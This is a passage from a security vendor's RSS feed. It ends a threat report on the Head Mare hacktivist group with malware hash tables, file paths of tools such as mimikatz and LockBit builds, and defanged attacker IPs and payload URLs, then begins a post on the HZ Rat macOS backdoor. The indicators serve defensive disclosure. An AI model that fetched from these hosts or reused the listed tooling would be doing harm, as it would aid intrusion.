  3220. <td width="50%"><strong>MD5 of similar samples</strong></td>
  3221. </tr>
  3222. <tr>
  3223. <td><a href="https://opentip.kaspersky.com/15333D5315202EA428DE43655B598EDA/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______017cbd89b9d2ac33&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">15333D5315202EA428DE43655B598EDA</a></td>
  3224. <td><a href="https://opentip.kaspersky.com/A2BD0B9B64FBDB13537A4A4A1F3051C0/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______3934c1e8a07fed77&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">A2BD0B9B64FBDB13537A4A4A1F3051C0</a></td>
  3225. </tr>
  3226. </tbody>
  3227. </table>
  3228. <h3 id="phantomcore">PhantomCore</h3>
  3229. <table width="100%">
  3230. <tbody>
  3231. <tr>
  3232. <td width="50%"><strong>MD5 of the original sample</strong></td>
  3233. <td width="50%"><strong>MD5 of similar samples</strong></td>
  3234. </tr>
  3235. <tr>
  3236. <td><a href="https://opentip.kaspersky.com/16F97EC7E116FE3272709927AB07844E/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______ead8466beb017f2a&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">16F97EC7E116FE3272709927AB07844E</a></td>
  3237. <td><a href="https://opentip.kaspersky.com/855B1CBA23FB51DA5A8F34F11C149538/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______b7503f4701fdd1bc&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">855B1CBA23FB51DA5A8F34F11C149538</a></td>
  3238. </tr>
  3239. <tr>
  3240. <td><a href="https://opentip.kaspersky.com/55239CC43BA49947BB1E1178FB0E9748/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______fbacb6abe9286d12&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">55239CC43BA49947BB1E1178FB0E9748</a></td>
  3241. <td><a href="https://opentip.kaspersky.com/0E14852853F54023807C999B4FF55F64/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______5e99078eee3e5381&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">0E14852853F54023807C999B4FF55F64</a><br />
  3242. <a href="https://opentip.kaspersky.com/99B0F80E9AE2F1FB15BFE5F068440AB8/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______18269dcb73b41347&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">99B0F80E9AE2F1FB15BFE5F068440AB8</a></td>
  3243. </tr>
  3244. </tbody>
  3245. </table>
  3246. <h3 id="lockbit">LockBit</h3>
  3247. <table width="100%">
  3248. <tbody>
  3249. <tr>
  3250. <td width="50%"><strong>MD5 of the original sample</strong></td>
  3251. <td width="50%"><strong>MD5 of similar samples</strong></td>
  3252. </tr>
  3253. <tr>
  3254. <td><a href="https://opentip.kaspersky.com/76B23DD72A883D8B1302BB4A514B7967/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______263b5246c05aad5d&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">76B23DD72A883D8B1302BB4A514B7967 </a></td>
  3255. <td><a href="https://opentip.kaspersky.com/6DDC56E77F57A069539DCC7F97064983/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______b0345ec8f522ae96&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">6DDC56E77F57A069539DCC7F97064983</a><br />
  3256. <a href="https://opentip.kaspersky.com/7ACC6093D1BC18866CDD3FECCB6DA26A/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______ad17e9f06ed12aa4&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">7ACC6093D1BC18866CDD3FECCB6DA26A</a><br />
  3257. <a href="https://opentip.kaspersky.com/59242B7291A77CE3E59D715906046148/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______a0845a4395859787&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">59242B7291A77CE3E59D715906046148</a></td>
  3258. </tr>
  3259. <tr>
  3260. <td><a href="https://opentip.kaspersky.com/6568AB1C62E61237BAF4A4B09C16BB86/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______8d594a61e756ed2a&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">6568AB1C62E61237BAF4A4B09C16BB86</a></td>
  3261. <td><a href="https://opentip.kaspersky.com/F7ABDAAE63BF59CA468124C48257F752/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______2f083e0c0546d151&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">F7ABDAAE63BF59CA468124C48257F752</a><br />
  3262. <a href="https://opentip.kaspersky.com/79D871FF25D9D8A1F50B998B28FF752D/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______8541abc68fab6b6d&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">79D871FF25D9D8A1F50B998B28FF752D</a><br />
  3263. <a href="https://opentip.kaspersky.com/78CC508882ABA99425E4D5A470371CB1/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______f80b65ccf89da62a&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">78CC508882ABA99425E4D5A470371CB1</a><br />
  3264. <a href="https://opentip.kaspersky.com/1D2D6E2D30933743B941F63E767957FB/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______5298b057a5e3fd41&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">1D2D6E2D30933743B941F63E767957FB</a></td>
  3265. </tr>
  3266. </tbody>
  3267. </table>
  3268. <h2 id="conclusions">Conclusions</h2>
  3269. <p>The tactics, methods, procedures, and tools used by the Head Mare group are generally similar to those of other groups associated with clusters targeting organizations in Russia and Belarus within the context of the Russo-Ukrainian conflict. However, the group distinguishes itself by using custom-made malware such as PhantomDL and PhantomCore, as well as exploiting a relatively new vulnerability, CVE-2023-38831, to infiltrate the infrastructure of their victims in phishing campaigns. This is an important aspect that Russian and Belarusian organizations should pay attention to: attackers are evolving and improving their TTPs.</p>
  3270. <h2 id="indicators-of-compromise">Indicators of compromise</h2>
  3271. <p><em>Please note: The network addresses provided in this section are valid at the time of publication but may become outdated in the future.</em></p>
  3272. <p><strong>Hashes:</strong><br />
  3273. <a href="https://opentip.kaspersky.com/201F8DD57BCE6FD70A0E1242B07A17F489C5F873278475AF2EAF82A751C24FA8/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______20663a65803c5fe4&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">201F8DD57BCE6FD70A0E1242B07A17F489C5F873278475AF2EAF82A751C24FA8</a><br />
  3274. <a href="https://opentip.kaspersky.com/9F5B780C3BD739920716397547A8C0E152F51976229836E7442CF7F83ACFDC69/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______b776970cef1f56fc&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">9F5B780C3BD739920716397547A8C0E152F51976229836E7442CF7F83ACFDC69</a><br />
  3275. <a href="https://opentip.kaspersky.com/08DC76D561BA2F707DA534C455495A13B52F65427636C771D445DE9B10293470/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______576bb11f1c097a03&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">08DC76D561BA2F707DA534C455495A13B52F65427636C771D445DE9B10293470</a><br />
  3276. <a href="https://opentip.kaspersky.com/6A889F52AF3D94E3F340AFE63615AF4176AB9B0B248490274B10F96BA4EDB263/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______4119a9d879ab8018&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">6A889F52AF3D94E3F340AFE63615AF4176AB9B0B248490274B10F96BA4EDB263</a><br />
  3277. <a href="https://opentip.kaspersky.com/33786D781D9C492E17C56DC5FAE5350B94E9722830D697C3CBD74098EA891E5A/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______571af1127ddea524&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">33786D781D9C492E17C56DC5FAE5350B94E9722830D697C3CBD74098EA891E5A</a><br />
  3278. <a href="https://opentip.kaspersky.com/5D924A9AB2774120C4D45A386272287997FD7E6708BE47FB93A4CAD271F32A03/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______4fae6f06eba530e9&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">5D924A9AB2774120C4D45A386272287997FD7E6708BE47FB93A4CAD271F32A03</a><br />
  3279. <a href="https://opentip.kaspersky.com/9B005340E716C6812A12396BCD4624B8CFB06835F88479FA6CFDE6861015C9E0/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______0d1b73ba766e4c3a&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">9B005340E716C6812A12396BCD4624B8CFB06835F88479FA6CFDE6861015C9E0</a><br />
  3280. <a href="https://opentip.kaspersky.com/5A3C5C165D0070304FE2D2A5371F5F6FDD1B5C964EA4F9D41A672382991499C9/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______095f1a8f46a56c93&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">5A3C5C165D0070304FE2D2A5371F5F6FDD1B5C964EA4F9D41A672382991499C9</a><br />
  3281. <a href="https://opentip.kaspersky.com/DC3E4A549E3B95614DEE580F73A63D75272D0FBA8CA1AD6E93D99E44B9F95CAA/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______81460b6f4f9fd474&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">DC3E4A549E3B95614DEE580F73A63D75272D0FBA8CA1AD6E93D99E44B9F95CAA</a><br />
  3282. <a href="https://opentip.kaspersky.com/053BA35452EE2EA5DCA9DF9E337A3F307374462077A731E53E6CC62EB82517BD/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______ec0b23676cbb79fc&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">053BA35452EE2EA5DCA9DF9E337A3F307374462077A731E53E6CC62EB82517BD</a><br />
  3283. <a href="https://opentip.kaspersky.com/2F9B3C29ABD674ED8C3411268C35E96B4F5A30FABE1AE2E8765A82291DB8F921/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______6e1d8260d2bc6655&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">2F9B3C29ABD674ED8C3411268C35E96B4F5A30FABE1AE2E8765A82291DB8F921</a><br />
  3284. <a href="https://opentip.kaspersky.com/015A6855E016E07EE1525BFB6510050443AD5482039143F4986C0E2AB8638343/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______836ef5b8043302b9&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">015A6855E016E07EE1525BFB6510050443AD5482039143F4986C0E2AB8638343</a><br />
  3285. <a href="https://opentip.kaspersky.com/9D056138CFB8FF80B0AA53F187D5A576705BD7954D36066EBBBF34A44326C546/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______fc8d5632035f6534&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">9D056138CFB8FF80B0AA53F187D5A576705BD7954D36066EBBBF34A44326C546</a><br />
  3286. <a href="https://opentip.kaspersky.com/22898920DF011F48F81E27546FECE06A4D84BCE9CDE9F8099AA6A067513191F3/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______5596dc5532e702f0&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">22898920DF011F48F81E27546FECE06A4D84BCE9CDE9F8099AA6A067513191F3</a><br />
  3287. <a href="https://opentip.kaspersky.com/2F1EE997A75F17303ACC1D5A796C26F939EB63871271F0AD9761CDBD592E7569/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______ac2dc5721b7e3a54&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">2F1EE997A75F17303ACC1D5A796C26F939EB63871271F0AD9761CDBD592E7569</a><br />
  3288. <a href="https://opentip.kaspersky.com/AF5A650BF2B3A211C39DCDCAB5F6A5E0F3AF72E25252E6C0A66595F4B4377F0F/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______cca20fe426abdbb7&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">AF5A650BF2B3A211C39DCDCAB5F6A5E0F3AF72E25252E6C0A66595F4B4377F0F</a><br />
  3289. <a href="https://opentip.kaspersky.com/9E9FABBA5790D4843D2E5B027BA7AF148B9F6E7FCDE3FB6BDDC661DBA9CCB836/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______efb8e564d407b26a&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">9E9FABBA5790D4843D2E5B027BA7AF148B9F6E7FCDE3FB6BDDC661DBA9CCB836</a><br />
  3290. <a href="https://opentip.kaspersky.com/B8447EF3F429DAE0AC69C38C18E8BDBFD82170E396200579B6B0EFF4C8B9A984/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______3d59e29abc426e96&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">B8447EF3F429DAE0AC69C38C18E8BDBFD82170E396200579B6B0EFF4C8B9A984</a><br />
  3291. <a href="https://opentip.kaspersky.com/92804FAAAB2175DC501D73E814663058C78C0A042675A8937266357BCFB96C50/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______affec3168409765a&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">92804FAAAB2175DC501D73E814663058C78C0A042675A8937266357BCFB96C50</a><br />
  3292. <a href="https://opentip.kaspersky.com/664B68F2D9F553CC1ACFB370BCFA2CCF5DE78A11697365CF8646704646E89A38/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______3d77c983cffd850a&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">664B68F2D9F553CC1ACFB370BCFA2CCF5DE78A11697365CF8646704646E89A38</a><br />
  3293. <a href="https://opentip.kaspersky.com/311EDF744C2E90D7BFC550C893478F43D1D7977694D5DCECF219795F3EB99B86/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______8a33f2bfabb75ef5&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">311EDF744C2E90D7BFC550C893478F43D1D7977694D5DCECF219795F3EB99B86</a><br />
  3294. <a href="https://opentip.kaspersky.com/4C218953296131D0A8E67D70AEEA8FA5AE04FD52F43F8F917145F2EE19F30271/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______f8ef19fc840e4720&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">4C218953296131D0A8E67D70AEEA8FA5AE04FD52F43F8F917145F2EE19F30271</a><br />
  3295. <a href="https://opentip.kaspersky.com/2D3DB0FF10EDD28EE75B7CF39FCF42E9DD51A6867EB5962E8DC1A51D6A5BAC50/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______3e13e445dedeadc0&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">2D3DB0FF10EDD28EE75B7CF39FCF42E9DD51A6867EB5962E8DC1A51D6A5BAC50</a><br />
  3296. <a href="https://opentip.kaspersky.com/DC47D49D63737D12D92FBC74907CD3277739C6C4F00AAA7C7EB561E7342ED65E/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______1188c7838099f156&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">DC47D49D63737D12D92FBC74907CD3277739C6C4F00AAA7C7EB561E7342ED65E</a><br />
  3297. EDA18761F3F6822C13CD7BEAE5AF2ED77A9B4F1DC7A71DF6AB715E7949B8C78B</p>
  3298. <p><strong>File paths:</strong><br />
  3299. $appdata\Microsoft\Windows\srvhostt.exe<br />
  3300. $appdata\Microsoft\Windows\srvhost.exe<br />
  3301. C:\Windows\system32\SrvLog.exe<br />
  3302. c:\Users\User\AppData\Local\microsoft\windows\srvhosts.exe<br />
  3303. c:\windows\srvhost.exe<br />
  3304. c:\ProgramData\OneDrive.exe<br />
  3305. c:\ProgramData\update\XenAllPasswordPro.exe<br />
  3306. c:\ProgramData\update\report.html<br />
  3307. $user\desktop\rsockstun.exe<br />
  3308. C:\ProgramData\resolver.exe<br />
  3309. $user\desktop\lockbitlite.exe<br />
  3310. $user\desktop\lb3.exe<br />
  3311. C:\ProgramData\lock.exe<br />
  3312. $user\desktop\x64\mimikatz.exe<br />
  3313. c:\Users\User\Documents\srvhost.exe<br />
  3314. c:\microsoft\windows\srchost.exe</p>
  3315. <p><strong>IP addresses</strong><br />
  3316. <a href="https://opentip.kaspersky.com/188.127.237%5B.%5D46/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______e1e2151e6a702294&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">188.127.237[.]46</a><br />
  3317. <a href="https://opentip.kaspersky.com/45.87.246%5B.%5D169/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______cf6378f5092db8c2&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">45.87.246[.]169</a><br />
  3318. <a href="https://opentip.kaspersky.com/45.87.245%5B.%5D30/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______4abb24632cd2710b&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">45.87.245[.]30</a><br />
  3319. <a href="https://opentip.kaspersky.com/185.80.91%5B.%5D107/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______2403839ecea4bc4d&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">185.80.91[.]107</a><br />
  3320. <a href="https://opentip.kaspersky.com/188.127.227%5B.%5D201/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______6ba6e3ea1a8b7453&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">188.127.227[.]201</a><br />
  3321. <a href="https://opentip.kaspersky.com/5.252.176%5B.%5D47/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______e38a8d397ea192fa&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">5.252.176[.]47</a><br />
  3322. <a href="https://opentip.kaspersky.com/45.11.27%5B.%5D232/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______4a0e0822b207b948&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">45.11.27[.]232</a></p>
  3323. <p><strong>URLs</strong><br />
  3324. <a href="https://opentip.kaspersky.com/188.127.237%5B.%5D46%2Fwinlog.exe/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______f5f698fe75734ba9&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">188.127.237[.]46/winlog.exe</a><br />
  3325. <a href="https://opentip.kaspersky.com/188.127.237%5B.%5D46%2Fservicedll.exe/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______cb85f52b56f12ed7&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">188.127.237[.]46/servicedll.exe</a><br />
  3326. <a href="https://opentip.kaspersky.com/194.87.210%5B.%5D134%2Fgringo%2Fsplhost.exe/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______13f0677d83c35e43&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">194.87.210[.]134/gringo/splhost.exe</a><br />
  3327. <a href="https://opentip.kaspersky.com/194.87.210%5B.%5D134%2Fgringo%2Fsrvhost.exe/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______282a33cbef240b96&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">194.87.210[.]134/gringo/srvhost.exe</a><br />
  3328. <a href="https://opentip.kaspersky.com/94.131.113%5B.%5D79%2Fsplhost.exe/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______b82ad8711afd2e04&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">94.131.113[.]79/splhost.exe</a><br />
  3329. <a href="https://opentip.kaspersky.com/94.131.113%5B.%5D79%2Fresolver.exe/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______5cc724f6e434a190&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">94.131.113[.]79/resolver.exe</a><br />
  3330. <a href="https://opentip.kaspersky.com/45.156.21%5B.%5D178%2Fdlldriver.exe/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______4e396075e4b96bb7&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">45.156.21[.]178/dlldriver.exe</a><br />
  3331. <a href="https://opentip.kaspersky.com/5.252.176%5B.%5D77%2Fngrok.exe/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______6aed532045f73791&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">5.252.176[.]77/ngrok.exe</a><br />
  3332. <a href="https://opentip.kaspersky.com/5.252.176%5B.%5D77%2Fsherlock.ps1/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______196139bb06fe9595&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">5.252.176[.]77/sherlock.ps1</a><br />
  3333. <a href="https://opentip.kaspersky.com/5.252.176%5B.%5D77%2Fsysm.elf/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______518fd0ba905471e7&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">5.252.176[.]77/sysm.elf</a><br />
  3334. <a href="https://opentip.kaspersky.com/5.252.176%5B.%5D77%2Fservicedll.rar/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______eeb7f599c878ca29&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">5.252.176[.]77/servicedll.rar</a><br />
  3335. <a href="https://opentip.kaspersky.com/5.252.176%5B.%5D77%2Freverse.exe/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______012d25de349dc4f9&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">5.252.176[.]77/reverse.exe</a><br />
  3336. <a href="https://opentip.kaspersky.com/5.252.176%5B.%5D77%2Fsoft_knitting.exe/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______76ec5ffd130cce45&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">5.252.176[.]77/soft_knitting.exe</a><br />
  3337. <a href="https://opentip.kaspersky.com/5.252.176%5B.%5D77%2Flegislative_cousin.exe/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______b9be8678ff936bb9&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">5.252.176[.]77/legislative_cousin.exe</a><br />
  3338. <a href="https://opentip.kaspersky.com/5.252.176%5B.%5D77%2F2000x2000.php/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______29ccf77fe14c2b6f&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">5.252.176[.]77/2000&#215;2000.php</a></p>
  3339. <hr>
  3340. <p><a href="#_ftnref1" name="_ftn1"><sup>[1]</sup></a> <a href="https://x.com/head_mare" target="_blank" rel="noopener">https://x.com/head_mare</a> is the account supposedly associated with the hacktivist group. Use this source with caution.</p>
  3341. ]]></content:encoded>
  3342. <wfw:commentRss>https://securelist.com/head-mare-hacktivists/113555/feed/</wfw:commentRss>
  3343. <slash:comments>0</slash:comments>
  3344. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30143637/SL-HeadMare-featured-01.jpg" width="1376" height="864"><media:keywords>full</media:keywords></media:content>
  3345. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30143637/SL-HeadMare-featured-01-1024x643.jpg" width="1024" height="643"><media:keywords>large</media:keywords></media:content>
  3346. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30143637/SL-HeadMare-featured-01-300x188.jpg" width="300" height="188"><media:keywords>medium</media:keywords></media:content>
  3347. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30143637/SL-HeadMare-featured-01-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  3348. </item>
  3349. <item>
  3350. <title>HZ Rat backdoor for macOS attacks users of China&#8217;s DingTalk and WeChat</title>
  3351. <link>https://securelist.com/hz-rat-attacks-wechat-and-dingtalk/113513/</link>
  3352. <comments>https://securelist.com/hz-rat-attacks-wechat-and-dingtalk/113513/#comments</comments>
  3353. <dc:creator><![CDATA[Sergey Puzan]]></dc:creator>
  3354. <pubDate>Tue, 27 Aug 2024 10:00:43 +0000</pubDate>
  3355. <category><![CDATA[Malware descriptions]]></category>
  3356. <category><![CDATA[Apple MacOS]]></category>
  3357. <category><![CDATA[Backdoor]]></category>
  3358. <category><![CDATA[Instant Messengers]]></category>
  3359. <category><![CDATA[Malware]]></category>
  3360. <category><![CDATA[Malware Descriptions]]></category>
  3361. <category><![CDATA[Malware Technologies]]></category>
  3362. <category><![CDATA[Non-Windows Malware]]></category>
  3363. <category><![CDATA[shell]]></category>
  3364. <category><![CDATA[Trojan]]></category>
  3365. <category><![CDATA[Unix and macOS malware]]></category>
  3366. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=113513</guid>
  3367.  
  3368. <description><![CDATA[Kaspersky experts discovered a macOS version of the HZ Rat backdoor, which collects user data from WeChat and DingTalk messengers.]]></description>
  3369. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27085625/hzrat-featured-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>In June 2024, we discovered a macOS version of the HZ Rat backdoor targeting users of the enterprise messenger DingTalk and the social network and messaging platform WeChat. The samples we found almost exactly replicate the functionality of the Windows version of the backdoor and differ only in the payload, which is received in the form of shell scripts from the attackers&#8217; server. We noticed that some versions of the backdoor use local IP addresses to connect to C2, which led us to believe the threat may be targeted. This also points to an intention to exploit the backdoor for lateral movement through the victim&#8217;s network.</p>
  3370. <p>First <a href="https://medium.com/%40DCSO_CyTec/hz-rat-goes-china-506854c5f2e2" target="_blank" rel="noopener">detected by DCSO researchers</a> in November 2022, HZ Rat initially targeted Windows systems and received commands in the form of PowerShell scripts.</p>
  3371. <h2 id="technical-details">Technical details</h2>
